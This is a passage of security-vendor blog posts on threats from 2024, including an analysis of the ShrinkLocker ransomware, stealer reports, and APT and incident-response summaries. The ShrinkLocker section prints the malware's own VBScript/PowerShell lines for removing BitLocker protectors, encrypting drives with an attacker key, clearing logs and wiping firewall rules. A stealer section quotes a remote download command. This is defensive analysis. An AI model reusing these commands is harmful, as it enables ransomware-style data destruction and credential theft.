Note that two of the three top regions are also leaders by percentage of ICS computers on which network folder threats were blocked.

  • Southeast Asia – 0.43%;
  • East Asia – 0.32%.
AutoCAD malware

AutoCAD malware can spread in a variety of ways, so it falls into a separate catogory.

The same regions that lead in the virus rankings are also the leaders by percentage of ICS computers on which AutoCAD malware was blocked:

  • Southeast Asia – 2.81%;
  • East Asia – 1.49%;
  • Africa – 0.61%.

Normally, AutoCAD malware is a minor threat that usually comes last in the malware category rankings by percentage of ICS computers on which it is blocked. In Southeast Asia in Q1 2024, this category was fifth.

The full global and regional reports have been published on the Kaspersky ICS CERT website.

ShrinkLocker: Turning BitLocker into ransomware

23 Květen, 2024 - 14:00


Attackers always find creative ways to bypass defensive features and accomplish their goals. This can be done with packers, crypters, and code obfuscation. However, one of the best ways of evading detection, as well as maximizing compatibility, is to use the operating system’s own features. In the context of ransomware threats, one notable example is leveraging exported functions present in the cryptography DLL ADVAPI32.dll, such as CryptAcquireContextA, CryptEncrypt, and CryptDecrypt. In this way, the adversaries can make sure that the malware can run and simulate normal behavior in various versions of the OS that support this DLL.

Although this seems smart enough, another clever technique caught our attention in a recent incident response engagement: using the native BitLocker feature to encrypt entire volumes and stealing the decryption key. The original purpose of BitLocker is to address the risks of data theft or exposure from lost, stolen, or improperly decommissioned devices. Nonetheless, threat actors have found out that this mechanism can be repurposed for malicious ends to great effect.

In that incident, the attackers were able to deploy and run an advanced VBS script that took advantage of BitLocker for unauthorized file encryption. We spotted this script and its modified versions in Mexico, Indonesia, and Jordan. In the sections below, we analyze in detail the malicious code obtained during our incident response effort and provide tips for mitigating this kind of threat.

This is not the first time we have seen BitLocker used for encrypting drives and demanding a ransom. Previously, attackers used this Microsoft utility to encrypt critical systems after accessing and controlling these. In this case, however, the adversary took additional steps to maximize the damage from the attack and hinder an effective response to the incident.

VBScript analysis

One interesting fact is that the attackers did not bother to obfuscate the bulk of the code, as threat actors typically do. The most plausible explanation for this is that they already had full control of the target system when the script was executed. It is stored at C:\ProgramData\Microsoft\Windows\Templates\ as Disk.vbs. Its first lines contain a function that converts a string to its binary representation using an ADODB.Stream object. This function is later used for encoding data to be sent in an HTTP POST request.

Stream_StringToBinary function

The first step by the main function of the script is to use Windows Management Instrumentation (WMI) to query information about the operating system with the help of the Win32_OperatingSystem class. For each object within the query results, the script checks if the current domain is different from the target. If it is, the script finishes automatically. After that, it checks if the name of the operating system contains “xp”, “2000”, “2003”, or “vista”, and if the Windows version matches any one of these, the script finishes automatically and deletes itself.

Initial conditions for execution

After that, the script continues to rely on WMI for querying information about the OS. It then performs disk resizing operations, which may vary with the result of the OS version check. These operations are performed solely on fixed drives (DriveType = 3). The following drive types typically exist in a file system:

$DriveType_map = @{ 0 = 'Unknown' 1 = 'No Root Directory' 2 = 'Removable Disk' 3 = 'Local Disk'  This is the DriveType searched by the malware. 4 = 'Network Drive' 5 = 'Compact Disc' 6 = 'RAM Disk' }

The likely reason the malware does not try to perform same operations on network drives (DriveType = 4) is to avoid triggering detection tools on the network.

To resize local drives in Windows Server 2008 or 2012, the script checks the primary boot partition and saves this information. It saves the index of the different partitions and then performs the following actions using diskpart:

  • Shrink the size of each non-boot partition by 100 MB. This creates 100 MB in unallocated space in each partition other than the boot volume;
  • Split the unallocated space into new 100 MB primary partitions;
  • Format the partitions with the override option, which forces the volume to dismount first if necessary, and assigns a file system and a drive letter to each;
  • Activate the partitions;
  • If the shrink procedure was successful, save “ok” as a variable, so the script can continue.

Disk resizing operations performed by the script in Windows Server 2008 and 2012

If the operation is successful, the code uses the utility bcdboot and the drive letter saved previously as a boot volume to reinstall the boot files on the new primary partitions.

Boot files reinstall

The partition shrink operations for other OS versions are similar but implemented with a different piece of code for compatibility reasons. The example below shows the process as applied to the Windows versions 7, 8, and 8.1.

Disk resizing operations in the Windows versions 7, 8, or 8.1

For Windows 2008 or 7, after the partition shrink procedure finishes, the variable matchedDrives saves the drive letters separated by commas, but only if the file system is NFTS, exFAT, FAT32, ReFS, or FAT. The code was modified to print an example:

matchedDrives variable data

The script then adds the following registry entries:

  • fDenyTSConnections = 1: disables RDP connections;
  • scforceoption = 1: enforces smart card authentication;
  • UseAdvancedStartup = 1: requires the use of the BitLocker PIN for pre-boot authentication;
  • EnableBDEWithNoTPM = 1: allows BitLocker without a compatible TPM chip;
  • UseTPM = 2: allows the use of TPM if available;
  • UseTPMPIN = 2: allows the use of a startup PIN with TPM if available;
  • UseTPMKey = 2: allows the use of a startup key with TPM if available;
  • UseTPMKeyPIN = 2: allows the use of a startup key and PIN with TPM if available;
  • EnableNonTPM = 1: allows BitLocker without a compatible TPM chip, requires a password or startup key on a USB flash drive;
  • UsePartialEncryptionKey = 2: requires the use of a startup key with TPM;
  • UsePIN = 2: requires the use of a startup PIN with TPM.

If the script detects an error, it restarts the system.

Registry modifications

By analyzing the malware dynamically, we can confirm the registry changes performed:

HKLM\SOFTWARE\Policies\Microsoft\FVE\UseTPMPIN: 0x00000002 HKLM\SOFTWARE\Policies\Microsoft\FVE\UseTPMKey: 0x00000002 HKLM\SOFTWARE\Policies\Microsoft\FVE\UseTPMKeyPIN: 0x00000002 HKLM\SOFTWARE\Policies\Microsoft\FVE\EnableNonTPM: 0x00000001 HKLM\SOFTWARE\Policies\Microsoft\FVE\UsePartialEncryptionKey: 0x00000002 HKLM\SOFTWARE\Policies\Microsoft\FVE\UsePIN: 0x00000002 HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseAdvancedStartup: 0x00000001 HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\EnableBDEWithNoTPM: 0x00000001 HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseTPM: 0x00000002 HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseTPMPIN: 0x00000002 HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseTPMKey: 0x00000002 HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseTPMKeyPIN: 0x00000002 HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\EnableNonTPM: 0x00000001 HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UsePartialEncryptionKey: 0x00000002 HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UsePIN: 0x00000002

Interestingly enough, there are several functions performing these operations, each designed for a different version of Windows. In some conditionals, it checks if BitLocker Drive Encryption Tools are active through the ID 266 of Remote Server Administration Tools. The malware then checks if the BitLocker Drive Encryption Service (BDESVC) is running. If not, it starts the service.

BDESVC verification

The script also changes the label of the new boot partitions to the attacker’s email as shown in the images below, so the victim can contact them.

Drive label modification

Attacker’s email as a drive label

After that, the malware disables the protectors used to secure BitLocker’s encryption key and deletes them. The deletion method may vary depending on the version of the OS. In a Windows Server 2008 or Windows 7 scenario, this is accomplished via VBS features, after which the script uses PowerShell to force the deletion of the protectors.

Having completed the deletion, it enables the use of a numerical password as a protector and the encryption feature.

Protectors deletion

The reason for deleting the default protectors is to avoid the recovery of the keys by the user, as in the example below.

The recovery of BitLocker keys

As the next step, the 64-character encryption key is generated by the malware using a random multiplication and replacement of the following elements:

  • A variable with the numbers 0–9;
  • The famous pangram, “The quick brown fox jumps over the lazy dog”, in lowercase and uppercase, which contains every letter of the English alphabet;
  • Special characters.

The randomness of this password is accomplished by a seed made of various elements of the affected system, such as used memory and network statistics. Later, this information is sent to the attacker. We tested the key generation logic in our environment, and with a slight modification of the script, we were able to see the generated password.

Key generation process

The code then converts the previously generated encryption key to a secure string—a PowerShell option that prevents creating a string object in memory—and effectively enables BitLocker on the drives.

If Len((CreateObject("WScript.Shell").Exec("powershell.exe -Command ""$protectors = (Get-BitLockerVolume -MountPoint " & drives(i) & ").KeyProtector; if ($protectors -ne $null) { foreach ($protector in $protectors) { Remove-BitLockerKeyProtector -MountPoint " & drives(i) & " -KeyProtectorId $protector.KeyProtectorId } }""")).stdout.readall) > 0 Then: End If If Len((CreateObject("WScript.Shell").Exec("powershell.exe -Command $a=ConvertTo-SecureString " & Chr(34) & Chr(39) & strRandom & Chr(39) & Chr(34) & " -asplaintext -force;Enable-BitLocker " & drives(i) & " -s -qe -pwp -pw $a")).stdout.readall) > 0 Then: End If If Len((CreateObject("WScript.Shell").Exec("powershell.exe -Command Resume-BitLocker -MountPoint " & drives(i) & " ")).stdout.readall) > 0 Then: End If

The script then creates an HTTP POST request object using the following options:

  • Use WinHTTP version 5.1.
  • Accept the French language.
  • Ignore SSL errors (httpRequest.Option(4) = 13056 à WinHttpRequestOption_SslErrorIgnoreFlags).
  • Disable redirects (httpRequest.Option(6) = false à WinHttpRequestOption_EnableRedirects).

The attackers used the domain trycloudflare.com to obfuscate their real address. This domain is legitimate, it belongs to CloudFlare and is used to provide quick tunnels for developers. The subdomain configured by the attackers was scottish-agreement-laundry-further.

Request creation

The malware also includes information about the machine and the generated password as a payload for the POST request, as shown in the image below.

Information to be sent in the POST request

The script also contains a loop that tries to send the information to the attacker five times if an error occurs.

Retry procedure

With some tweaks, we were able to print the data being sent to the attacker, as shown in the image below. Note that the data includes the computer name, Windows version, drives affected, and the password string. Consequently, the victim’s IP address will also be logged on the attacker’s server, allowing them to track each victim.

Information to be sent

After removing the BitLocker protectors and configuring drive encryption, the script goes through the following steps to cover its tracks.

It validates if the hostname is the target of this malware, then deletes the files:

  • \Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
  • \scripts\Login.vbs
  • \scripts\Disk.vbs
  • C:\ProgramData\Microsoft\Windows\Templates\Disk.vbs

Delete operations

The script then clears the Windows PowerShell and Microsoft-Windows-PowerShell/Operational logs with wevtutil. It turns on the system firewall and deletes all of its rules. It also deletes the tasks VolumeInit and VolumeCheck. Finally, the malware performs a forced shutdown.

If Len((CreateObject("WScript.Shell").Exec("wevtutil cl ""Windows PowerShell""")).stdout.readall) > 0 Then: End If If Len((CreateObject("WScript.Shell").Exec("wevtutil cl ""Microsoft-Windows-PowerShell/Operational""")).stdout.readall) > 0 Then: End If If Len((CreateObject("WScript.Shell").Exec("netsh advfirewall set allprofiles state on")).stdout.readall) > 0 Then: End If If Len((CreateObject("WScript.Shell").Exec("netsh advfirewall firewall delet rule name=all")).stdout.readall) > 0 Then: End If If Len((CreateObject("WScript.Shell").Exec("schtasks /Delete /TN ""VolumeInit"" /F")).stdout.readall) > 0 Then: End If If Len((CreateObject("WScript.Shell").Exec("schtasks /Delete /TN ""VolumeCheck"" /F")).stdout.readall) > 0 Then: End If

After the shutdown, the victim will see the BitLocker screen. If the user tries to use the recovery options, they will see nothing but the message, “There are no more BitLocker recovery options on your PC”.

BitLocker recovery screen

Tactics, techniques and procedures

The analysis showed that this threat actor has an extensive understanding of the VBScript language, and Windows internals and utilities, such as WMI, diskpart, and bcdboot. Below are the TTPs identified for this scenario.

Tactic Technique ID Execution Command and Scripting Interpreter: Visual Basic T1059.005 Execution Windows Management Instrumentation T1047 Execution Command and Scripting Interpreter: PowerShell T1059.001 Impact Data Encrypted for Impact T1486 Impact System Shutdown/Reboot T1529 Defense evasion Clear Windows Event Logs T1070.001 Defense evasion Modify Registry T1112 Defense Evasion Disable or Modify System Firewall T1562.004 Exfiltration Exfiltration Over Web Service T1041 Artifacts and digital forensics

As the local activity performed by the script includes cleaning up its traces, clearing some logs and the tasks created for execution, and finally, encrypting the whole drive, it was not easy to get forensic artifacts to identify the malicious activities and to find opportunities for decryption.

Fortunately, some of the script content and commands executed were registered and logged by a third-party service, and these were collected for analysis. This allowed us to obtain the secure strings to which the encryption keys were converted from some of the affected systems.

Secure strings obtained

Elsewhere, we attempted to collect network logs where the POST requests to the C2 were stored. However, the most common configuration for web activity logging includes GET but unfortunately not POST requests.

We did finally obtain the POST requests, but this was very challenging. The case provides justification for logging POST traffic and ensuring that all critical system activity is forwarded to a central repository with enough space for storing data for the recommended retention period (six or more months) to avoid losing evidence after attackers remove all their traces from the individual systems.

Finally, some systems in the customer’s infrastructure remained unencrypted and were considered unaffected at first. However, we later found out that they had, in fact, been affected, but BitLocker was not configured in these systems. This made it possible for us to obtain the script itself, analyze its behavior and collect further evidence.


While we could obtain some of the passphrases and fixed values implemented by the threat actor to create the encryption keys, the script includes some variable values and those are different for each single affected system, making the decryption process difficult.

Network information collected for use in the seed


Companies are encouraged to use BitLocker or other encryption tools (such as VeraCrypt) to protect corporate secrets. However, a few precautions must be taken to avoid the abuse by attackers.

  • Use robust, properly configured EPP solution to detect threats that try to abuse BitLocker;
  • Implement Managed Detection and Response (MDR) to proactively scan for threats;
  • If BitLocker is enabled, make sure you are using a strong password and have the recovery keys stored in a secure location;
  • Ensure that users have only minimal privileges. This way, they cannot enable encryption features or change registry keys on their own;
  • Enable network traffic logging and monitoring. Configure the logging of both GET and POST requests. In case of infection, the requests made to the attacker’s domain may contain passwords or keys;
  • Monitor for events associated with VBS execution and PowerShell, and save the logged scripts and commands to an external repository storing activity that may be deleted locally;
  • Make backups frequently, store them offline, and test them.

If you need assistance with investigation of a ransomware attack and recovering encrypted data, please contact us at [email protected].


Our incident response and malware analysis are evidence that attackers are constantly refining their tactics to evade detection. In this incident, we observed the abuse of the native BitLocker feature for unauthorized data encryption. The VBS script demonstrates that the malicious actor involved in this attack have an excellent understanding of Windows internals. Although the script analysis was not complicated at all, this kind of threat is difficult to detect, since unique strings inside the artifact can be easily modified to bypass YARA rules. Therefore, the best detection method in scenarios like these is behavioral analysis, which correlates different actions performed by the application to reach a verdict.

Kaspersky products detect the threat described in this article with the following verdicts:

  • Trojan.VBS.SAgent.gen;
  • Trojan-Ransom.VBS.BitLock.gen;
  • Trojan.Win32.Generic.
Indicators of compromise


E-mail addresses:

MD5 hashes:

A journey into forgotten Null Session and MS-RPC interfaces

23 Květen, 2024 - 11:00

A journey into forgotten Null Session and MS-RPC interfaces (PDF)

It has been almost 24 years since the null session vulnerability was discovered. Back then, it was possible to access SMB named pipes using empty credentials and collect domain information. Most often, attackers leveraged null sessions for gathering domain users through techniques such as RID (Relative Identifier) enumeration. RIDs uniquely identify users, groups, computers and other entities within the domain. To enumerate them, the attacker used MS-RPC interfaces to make some calls and collect information from the remote host.

To prevent such attacks, Microsoft restricted null session capabilities by limiting what an attacker can do after connecting to named pipes, and provided security policies that could be implemented to stop all null session activities. Today, although null sessions still exist and are enabled by default on domain controllers (most likely for compatibility purposes), most system administrators close this capability by hardening the security policies and monitoring domain controller activities, including anonymous access through SMB.

As penetration testers, we always pose the question: is it really as secure as it seems? In this case we asked if we can bypass policies and restrictions today, after 24 years, and bring the idea of anonymous access back to life. This research is tailored for security researchers and penetration testers seeking to enhance their understanding of MS-RPC interfaces and refine their research techniques. It’s important to note that all information in this article is intended for legitimate security research purposes only, and must not be used for illegal activities.

The research is divided into two parts. In this post we share the first part, devoted to the research methodology against MS-RPC interfaces, developed after observing some interesting behavior from one of the Windows interfaces. Also included is a discussion of how we can link this behavior to null sessions, and revive their legacy by enumerating information from the domain controller, specifically domain users without triggering any alerts.

About null session

Null sessions have emerged as a pivotal area of interest and concern within the field of cybersecurity. They occur when access to a network resource, most commonly the IPC$ “Windows Named Pipe” share, is granted with empty credentials. $IPC (Inter-Process Communication) is a hidden share that processes on different computers use to communicate with each other. After obtaining anonymous access to this resource, an attacker can bind an MS-RPC interface exposed by a particular named pipe inside the IPC$ share, and start to gather information such as shares, users, groups, registry keys and much more.

In newer Windows versions, the null session capability has become more restricted, and is available in Windows servers that act as domain controller only. When you upgrade your server to a domain controller, null session access to the following named pipes is available by default:

  • “\pipe\netlogon”;
  • “\pipe\samr”;
  • “\pipe\lsarpc”.

To prevent null sessions, two related system policies were introduced: “Restrict anonymous access to Named Pipes and Shares” and “Network access: Named Pipes that can be accessed anonymously.” The first policy, “Restrict anonymous access to Named Pipes and Shares,” is enabled by default. The second policy, “Network access: Named Pipes that can be accessed anonymously,” contains the three named pipes we discussed earlier (netlogon, samr, and lsarpc). To prevent any action related to null sessions, the latter policy is set to empty so that these named pipes can be accessed anonymously.

Enumerating network interfaces without authentication

During my work in traffic analysis, I noticed many packets related to DCOM communications between domain controller and other endpoints, which were tagged by Wireshark under the IOXIDResolver RPC interface and the ServerAlive2() method. The IOXIDResolver interface is actually the IObjectExporter interface. As Microsoft mentions, it is used for OXID resolution, pinging and server aliveness tests. In brief, it helps in the process of locating and connecting to remote objects involved in resolving OXID references to actual network locations (such as IP addresses) of objects in a DCOM environment.

One of the IObjectExporter methods is ServerAlive2. The ServerAlive2 (OPNUM 5) method was introduced with version 5.6 of the DCOM Remote Protocol, and extends the ServerAlive method. It returns string and security bindings for the object resolver, which allows the client to choose the most appropriate settings, compatible with both client and server. The IObjectExporter interface uses TCP port 135 as an MS-RPC endpoint.

In the traffic for each TCP stream related to DCOM communication, there were four packets. The first is related to binding the IObjectExporter interface, the second to the server binding response, the third to the ServerAlive2 function call, and the final packet is the response for the ServerAlive2 function, which contains all the network interfaces for the domain controller.

Bind request packet

The image above shows a bind request for IObjectExporter interface. You can see that the Auth Length header is equal to zero, indicating that the authentication level is None, and hence, there is no authentication. With just two packets from the client, we can enumerate network interfaces for the remote host without authentication.

The idea struck me: what if there are other RPC interfaces vulnerable to no authentication? What kind of enumeration could be obtained from them? Can we map it to the famous null session? And what research strategy should I follow to find this out? In the full version of the research (PDF), I try to answer these questions, discuss a new path for enumerating domain information, and share a tool that implements the idea of this new path.

Stealers, stealers and more stealers

22 Květen, 2024 - 12:00


Stealers are a prominent threat in the malware landscape. Over the past year we published our research into several stealers (see here, here and here), and for now, the trend seems to persist. In the past months, we wrote several private reports on stealers as we discovered Acrid (a new stealer), ScarletStealer (another new stealer) and Sys01, which had been updated quite a bit since the previous public analysis.

To learn more about our crimeware reporting service, you can contact us at [email protected].


Acrid is a new stealer found last December. Despite the name, it has nothing in common with the AcridRain stealer. Acrid is written in C++ for the 32-bit system, despite the fact that most systems are 64 bit these days. Upon closer inspection of the malware, the reason for compiling for a 32-bit environment became clear: the author decided to use the “Heaven’s Gate” technique. This allows 32-bit applications to access the 64-bit space to bypass certain security controls.

“Heaven’s Gate” technique implementation in Acrid stealer

In terms of functionality, the malware embeds the typical functionality one might expect from a stealer:

  • Stealing browser data (cookies, passwords, login data, credit card information, etc.);
  • Stealing local cryptocurrency wallets;
  • Stealing files with specific names (e.g. wallet.dat, password.docx, etc.);
  • Stealing credentials from installed applications (FTP managers, messengers, etc.).

Collected data is zipped and sent to the C2.

The malware is of medium sophistication. It has a certain degree of complexity, such as string encryption, but lacks any innovative features.


Last January, we analyzed a downloader we dubbed “Penguish”, which we described in detail in a private report. One of the payloads it downloaded was a previously unknown stealer we call “ScarletStealer”.

ScarletStealer is a rather odd stealer as most of its stealing functionality is contained in other binaries (applications and Chrome extensions) that it downloads. To be more precise, when ScarletStealer is executed, it checks for the presence of cryptocurrencies and crypto wallets by checking certain folder paths (e.g. %APPDATA%\Roaming\Exodus). If anything is detected, it starts to download the additional executables using the following PowerShell command:

powershell.exe -Command "Invoke-WebRequest -Uri 'https://.........exe' - OutFile $env:APPDATA\\.........exe

Among the binaries it downloads are metaver_.exe (used to steal content from Chrome extensions), meta.exe (modifies the Chrome shortcut, so the browser is launched with a malicious extension), and others. Most of the ScarletStealer executables are digitally signed.

Metamask grabbing function

The stealer is very underdeveloped in terms of functionality and contains many errors, flaws and redundant code. For example, the malware tries to gain persistence on the system by creating a registry key for autorun. The registry key contains the path to the file Runtimebroker_.exe, but we did not find any code in any of the files involved in the infection that would store at least one executable file with that name.

Therefore, it is rather odd that this stealer is distributed through a long chain of downloaders, where the last one is the Penguish downloader, and signed with a digital certificate. One would expect that all this effort would result in a more advanced stealer than ScarletStealer.

ScarletStealer victims are mostly located in Brazil, Turkey, Indonesia, Algeria, Egypt, India, Vietnam, the USA, South Africa and Portugal.


SYS01 (also known as “Album Stealer” or “S1deload Stealer”) is a relatively unknown stealer that has been around since at least 2022. It has been described by Bitdefender, Zscaler and Morphisec. In their reports, you can follow its evolution from a C# stealer to a PHP stealer. When we started to look into this campaign we noticed a combination of the two, a C# and PHP payload.

One thing that has not changed is the infection vector. Users are still tricked into downloading a malicious ZIP archive disguised as an adult video via a Facebook page:

Ad for the malicious ZIP archive on a compromised facebook page

The archive contains a legitimate binary — in this case WdSyncservice.exe, renamed to PlayVideoFull.exe — that sideloads a malicious DLL named WDSync.dll. The DLL opens an adult-themed video and executes the next payload, which is a malicious PHP file encoded with ionCube.

The executed PHP file calls a script, install.bat, which ultimately runs the next stage by executing a PowerShell command. This layer is conveniently named runalayer and runs what seems to be the final payload called Newb.

There is, however, a difference between the latest version of the stealer and the previous publicly disclosed versions, which consists in the split of functionality. The stealer as it is now (Newb), contains functionality to steal Facebook-related data and to send stolen browser data, located and organized in a specific directory structure to the C2. It also has backdoor functions, and it can execute the following commands, among others:

Command Description dll Download file, kill all the specified processes and start a new process using PowerShell (the command decrypts, unzips and executes the specified file). The PowerShell routine is similar to the routines observed earlier. cmd Kill a list of specified processes and start a new process. dls Download a file, kill all the specified processes and start a new specified process.

But the code that actually collects the browser data Newb sends to C2 was found in a different sample named imageclass. We were not able to determine with 100% certainty how imageclass was pushed to the system, but looking at the backdoor code of Newb, we concluded with a high degree of certainty that imageclass was later pushed through Newb to the infected machine.

The initial ZIP archive also contains another malicious PHP file: include.php. This file has similar backdoor functionality to Newb and accepts many of the same commands in the same format.

Victims of this campaign were found all over the world, but most of them were located in Algeria (a bit over 15%). This most likely has to do with the infection vector as it can be heavily localized. We also noticed that the malware authors have a preference for .top TLDs.


Stealers are a prominent threat that is here to stay. In this post, we have discussed an evolution of a known stealer, as well as two completely new stealers with different levels of complexity. The fact that new stealers appear every now and then, combined with the fact that their functionality and sophistication varies greatly, indicates that there is a criminal market demand for stealers.

The danger posed by stealers lies in the consequences. This malware steals passwords and other sensitive information, which later can be used for further malicious activities causing great financial losses among other things. To protect yourself against stealers and other threats, it is essential to follow a number of basic hygiene rules. Always update your software with the latest security patches, don’t download any files from dubious sources, don’t open attachments in suspicious emails, etc. Finally, if you want to be even more sure, a security solution, such as our SystemWatcher component, that looks at the behavior of events on your machine can help to protect your system as well.

If you would like to stay up to date on the latest TTPs being used by criminals, or if you have questions about our private reports, you can contact us at [email protected].

Indicators of compromise




QakBot attacks with Windows zero-day (CVE-2024-30051)

14 Květen, 2024 - 19:14

In early April 2024, we decided to take a closer look at the Windows DWM Core Library Elevation of Privilege Vulnerability CVE-2023-36033, which was previously discovered as a zero-day exploited in the wild. While searching for samples related to this exploit and attacks that used it, we found a curious document uploaded to VirusTotal on April 1, 2024. This document caught our attention because it had a rather descriptive file name, which indicated that it contained information about a vulnerability in Windows OS. Inside we found a brief description of a Windows Desktop Window Manager (DWM) vulnerability and how it could be exploited to gain system privileges, everything written in very broken English. The exploitation process described in this document was identical to that used in the previously mentioned zero-day exploit for CVE-2023-36033, but the vulnerability was different. Judging by the quality of the writing and the fact that the document was missing some important details about how to actually trigger the vulnerability, there was a high chance that the described vulnerability was completely made up or was present in code that could not be accessed or controlled by attackers. But we still decided to investigate it, and a quick check showed that this is a real zero-day vulnerability that can be used to escalate privileges. We promptly reported our findings to Microsoft, the vulnerability was designated CVE-2024-30051, and a patch was released on May 14, 2024, as part of Patch Tuesday.

After sending our findings to Microsoft, we began to closely monitor our statistics in search of exploits and attacks that exploit this zero-day vulnerability, and in mid-April we discovered an exploit for this zero-day vulnerability. We have seen it used together with QakBot and other malware, and believe that multiple threat actors have access to it.

We are going to publish technical details about CVE-2024-30051 once users have had time to update their Windows systems.

Kaspersky products detect the exploitation of CVE-2024-30051 and related malware with the verdicts:

  • PDM:Exploit.Win32.Generic;
  • PDM:Trojan.Win32.Generic;
  • UDS:DangerousObject.Multi.Generic;
  • Trojan.Win32.Agent.gen;
  • Trojan.Win32.CobaltStrike.gen.

Kaspersky would like to thank Microsoft for their prompt analysis of the report and patches.

Incident response analyst report 2023

14 Květen, 2024 - 13:00

Incident response analyst report 2023

As an information security company, our services include incident response and investigation, and malware analysis. Our customer base spans Russia, Europe, Asia, South and North America, Africa and the Middle East. Our annual Incident Response Report presents anonymized statistics on the cyberattacks we investigated in 2023. All data is derived from working with organizations that requested our expertise in carrying out incident response (IR) or assisting their in-house expert team.

Distribution of incidents by region and industry

The geography of the service has changed somewhat of late, with the share of requests in Russia and the CIS (47.27%) continuing to rise. At the same time, 2023 is notable for the significant increase in the number of IR requests in the second-place Americas region (21.82%).

Geographic distribution of IR requests, 2023

Looking at the distribution of incidents by industry, we see that in 2023 the majority of requests came from government agencies (27.89%) and industrial enterprises (17.01%).

Distribution of organizations that requested IR assistance, by industry, 2023

2023 trends: ransomware and supply chain attacks

In 2023, ransomware remained the most prevalent threat, despite a drop in share to 33.3%, down from 39.8% in 2022. Ransomware targeted organizations indiscriminately, regardless of industry. The most common families we came across in our investigations were LockBit (27.78%), BlackCat (12.96%), Phobos (9.26%) and Zeppelin (9.26%).

Another important trend we observed in 2023 was the significant rise in the number of attacks through trusted relationships with contractors and service providers. This attack vector was among the three most frequently seen in 2023. This is not surprising, for it allows threat actors to carry out large-scale attacks with a great deal more efficiency than if they targeted each victim individually. For many organizations such attacks can be devastating, and detecting them takes a lot longer because the attackers’ actions can be hard to distinguish from those of employees working for a contractor.

Report contents

The full report covers:

  • IR statistics: what events prompted organizations to request IR services, at what stages attacks were detected, how long it took on average to respond to them;
  • Common tactics, techniques and procedures employed by threat actors at different stages of attack development;
  • Legitimate tools used in attacks, with examples of their use in real-world incidents;
  • Vulnerabilities most often exploited by threat actors.
Recommendations for preventing cyberincidents

To reduce the risk of a successful cyberattack on your organization, or minimize the damage if attackers do penetrate your infrastructure, we recommend:

  • Enforcing a strict password policy and protecting key resources with multi-factor authentication;
  • Closing remote management ports to outside access;
  • Promptly updating software and deploying additional security measures for services at the network perimeter;
  • Cybersecurity awareness training and related activities for employees;
  • Restricting the use of legitimate tools that may be utilized for attacks on the corporate network, and creating rules for detecting such tools;
  • Conducting regular cyber drills focused on common attacker techniques;
  • Backing up data on a regular basis;
  • Protecting endpoints with EDR solutions;
  • Subscribing to an IR service guaranteed under an SLA.

Read the full 2023 Incident Response Report (PDF).

APT trends report Q1 2024

9 Květen, 2024 - 12:00

For more than six years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. These summaries are based on our threat intelligence research. They provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q1 2024.

Readers who would like to learn more about our intelligence reports or request more information about a specific report, are encouraged to contact [email protected].

The most remarkable findings

The Gelsemium group performs server-side exploitation that effectively leads to a webshell, and uses various custom and public tools deployed with stealth techniques and technologies. The two main implants, SessionManager and OwlProxy, were first detected in 2022 in the aftermath of the ProxyLogon-type exploitations of Exchange Servers. Our latest investigation was prompted by the discovery of suspicious activity on a server located in Palestine in mid-November 2023, with traces of a previous breach attempt on October 12, 2023. The payloads were distinctively served, veiled as font files, in compressed and encrypted fashion. This characteristic led us to highly similar incidents in Tajikistan and Kyrgyzstan.

Careto is a highly sophisticated threat actor that has been seen targeting various high-profile organizations since at least 2007. However, the last operations conducted by this threat actor were observed in 2013. Since then, no information about Careto’s activity has been published. Recent threat hunting enabled us to gain an insight into campaigns run by Careto in 2024, 2022 and 2019. Our private report provided a detailed description of these activities, focusing on how the actor performed the initial infections, lateral movement, malware execution, and data exfiltration activities. It is notable that the Careto actor used custom techniques, such as employing the MDaemon email server to maintain a foothold inside the organization or leveraging the HitmanPro Alert driver for persistence. In total, we have seen Careto use three complex implants for malicious activities, which we dubbed “FakeHMP”, “Careto2”, and “Goreto”. The capabilities of these implants were also described in our private report.

Middle East

In March, a new malware campaign was discovered, targeting government entities in the Middle East. We dubbed it “DuneQuixote”. Our investigation uncovered more than 30 DuneQuixote dropper samples actively employed in this campaign. The droppers represent tampered with installer files for a legitimate tool named “Total Commander”. These carry malicious code for downloading further payloads, at least some of which are backdoor samples dubbed “CR4T”. At the time of discovery, we identified only two such implants, yet we strongly suspect the existence of others that may come in the form of completely different malware. The group prioritized the prevention of collection and analysis of their implants – the DuneQuixote campaigns display practical and well-designed evasion methods, both in network communications and malware code.

Our last report on the Oilrig APT discussed how IT service providers were potentially used as a pivot point to reach their clients as an end-target, and we kept tracking the threat actor’s activity to identify relevant infection attempts. We detected another activity in the process, likely by the same threat actor, but this time targeting an internet service provider in the Middle East. This new activity saw the actor using a .NET-based implant, which is staged using VB and PowerShell. The implant, which we named “SKYCOOK” for its function names, is a remote command execution and infostealer utility. The actor also used an autohotkey-based (AHK) keylogger similar to the one used in a previous intrusion.

Southeast Asia and Korean Peninsula

We have been tracking the activities of DroppingElephant in the past few years and recently detected several samples of the Spyder backdloor in its operations, as well as the Remcos RAT and, in a smaller number of cases, other malicious RAT tools. We observed that the threat actor abuses the DISCORD CDN network and leverages malicious .DOC and .LNK files to deliver these remote access tools to victims in South Asia. The Spyder backdoor has been detailed by QiAnXin, along with its use in targeting multiple entities in South Asia. In our report, we shared newly discovered IoCs and the type of targeted organizations based on our telemetry.

At the end of 2023, we discovered a striking malware variant orchestrated by the Kimsuky group, delivered by exploiting legitimate software exclusive to South Korea. While the precise method used to manipulate this legitimate program as the initial infection vector remains unclear, we confirmed that the legitimate software established a connection to the attacker’s server. Subsequently, it retrieved a malicious file, thereby initiating the first stage of the malware.

